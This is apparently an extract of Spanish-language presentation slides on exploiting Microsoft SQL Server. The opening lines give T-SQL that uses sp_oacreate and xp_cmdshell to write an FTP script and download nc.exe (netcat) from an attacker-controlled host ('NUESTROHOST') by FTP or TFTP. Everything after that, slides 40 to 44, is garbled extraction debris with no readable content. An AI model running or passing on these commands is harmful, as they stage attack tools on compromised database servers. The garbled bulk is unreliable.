@f, 'writeline', NULL, 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos.- Creamos un archivo get.txt para utilizar luego ftp declare @o int, @f int, @t int, @ret int EXECUTE sp_oacreate 'scripting.filesystemobject', @o out EXECUTE sp_oamethod @o, 'createtextfile', @f out, 'c:get.txt', 1 EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit' EXECUTE master.xp_cmdshell 'FTP -s c:get.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET c:mi_local_file c:remote_file'
  • 40. 3 ----- Extracto ------------------------------------------ :M& ) & ) " " ( " * " " )4 " . " " " 6 " " #0#$% # 6 & 6 " *=" " 9 " ) " . " " " 8 " " & " " Q + " Q 9 " " . " )4 :%8 " " * #$% # 6 E " 4 " . * "+" )4 F + " 7 " " " . )4 6 " ) " ; " Q . & c " & )4 M : ;! ; ` & < a ; " Q )4 M & ` & 6 : ;! ; a ` & ` V a ` : ;! ; a ` a a " 3 , + # ) " " " & 9 #0#$% " ) " " 9 " 7" " " "& ) 9 " . " " & " * " & 9 ) 4 .J 6 " " J " " ) " 7 " #$% 4 ! " 9 " D " + #$% 9 6 " ) " " " ) < " 6 & + = " ) " " " " ( " E: ) = " "IF & " + * " " " ) * " 6 " . & " " #$% + " 5 ) " * . >; : G ) 5 # + ! 4 > " " 7 . " " ) " " #$% 4 + " ) " " " " " 0 * # L 1;: : ;A %8L ' > > % + = " " + ) = " " J " " "
  • 41. 3 0 3 ! # )" " " ) " 1 :1 " ) H " " " E *Q* KF 1 " J " " " 0 +,- # )" " " ) " 1 :1 " ) ! " 5 " 1 " J " " " 0 $ . # ':!S E8 " " F # )" " " ) " 1 :1 " ) ! " 5 " J " " " " " ) "K 0 # )" " " ) " 1 :1 " ) ! " 5 " J " " " " " ) "K " " " " " " " * E< Q " & " Q " F "@ % & A . & 6 " . * % " " " 9 " " " * " ( ". * & " " 6 ) " " #0#$% " 7 " 4 " " ' " " & " " & " " . " . "& " " " " " ) ) ) " . 7 . " ( 6 # 6 ! M " " 6 " " 9 " " 6 7 . " ( " J " " " " 6 " " 9 " " 6 ! 4 *=" " " " 6 " ) " " 8" ) ( ! = ' ( A " 6= # * * " " < " " = " 8" + " ;'! 322 + ,! 323F 1 " " 6 " ) " " 6 ) " " 1 " " = & " 6 #$% " 6 " "
  • 42. 3 ! " " " . " . * . E, " 6 " ) " " " " . ( & M" ) * . F H * 9 6 " " " " " #0#$% # 6 8" ) ( " 6 . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . 6 " * " * E " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " . & " " " * " . " 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ) " " "A % B ! #0#$% # 6 " " & + " " ) " 7 " + 6 " " 6 " . " . " " " * " " " " . & 9 9 " ) " " " " " ) + + " ( " . 6 ( " " " " ) 4 " " " " " 6 " " " . ' " * & " " 9 . " 6 " " " 6 & < " " ) " " " " . + " " " " 9 + = " " " 6 " ) " & " ) < 7< " + " " 7 " M . " ) #0#$% # 6 8 " " " . "& " " + "* ( " " A " "& " " + # 6 " ! M" = & * . " " " 6 " ) " "& " . * " * 6 " " . G " & " ) " " 6 " " "& " " " " ) > .= " ) " . " . > + " " " " ) " " . & ) = 6 " #$% 4 . *= 4 # ) * " " & 74 " 6 " " * M . * " G " 8 " & " " " * "& " " " " " + " " " . * ) = " . " " " " 6 ) " 6 " E; " " #0#$%F 8" ) " " " " 9 " . " D " " . * ) " . ( # #;8 5 G "
  • 43. 32 ' 6 G " 2& + " " " ) " 9 " " " " ) " " " . E5 ( " 5 "& , 6 " # . & 8A#& F "= ) 7 %81;: " * " ( " " " " * & " " 9 " . ) " " #0 #& #0#$%& # " " 8 !& " " ) ( " * & " . & + 9 #:- 8 " " 6 5 " " 9 + "* " + 9 " ) " " " " " + " 6 " " & " " " 7 " 5 " 6 " . " " 7 " #$% 4 & 6 9 6 " " > * " + % " ' "> " " 9 " < 6 # " "& + " " < 5 " >5 . ! > "C ) * # % & ! & - M > M . 8< " G " > E #-1 B303B 022CB0@F " M . M " Q QG " "9 "9 Q 3 "9 " + " * "9 6 6 " + " " + " " #$% 4 G ! * " " " .Q#$%Q# 6 Q " .Q#$%Q 4 * < . "" " 6 Q"9 Q 4 * < . "" " Q 6 Q"9 Q 4 * < . "" " 0#$% * < . "" " M .0"9 0 "" " * < . "" " 6 .Q ) " Q" + * " " + 6 " ?,! 1 ! @8 " . " Q6 "9 " "D ! M < M " " + * " M M M " " + . ' M " #9 )* (
  • 44. 33 M " " + . 1; " " #9 M ( M " " + . G "9 < M " " + . G "9 . ( M " " + + . ) 5 "0 0 @0) ( << " " " " * " " " M " " MQJ " + " ; " " B % ! ( 01 ( , :! " 9 " " )+ 1 0 " . II )+ 5 . 0' ' % . " " F )+ 6 0S " * " ) " " " ) "I )+ 5 . 59 = 6. & ** " * . & " " 9 " " = " * " " 6 = " " " " " " ( . 6 . (( # + ; & " . " > > < 1 ) 9 " * " 9 = = & + 9 " ) " " "& " * 9 . " " + 9 " < " ) " " " " " " ) " " ) 8 " . . & . ( " " " 6 " " " " D " 1 + 6 9 " "* ( " " " * . 9 " " ") ( " " " " * " ; ) 7 . " = + # 9 " " " " " #0#$%& . " " " " . / " 9 " 9 67" " " " " " + * " " " #$% 4 E8" . O1 < / # + # * % d " " " J "KF ! & . " " 9 " . " " " " " " " . * & < " 9 D 5 " >5 . ! >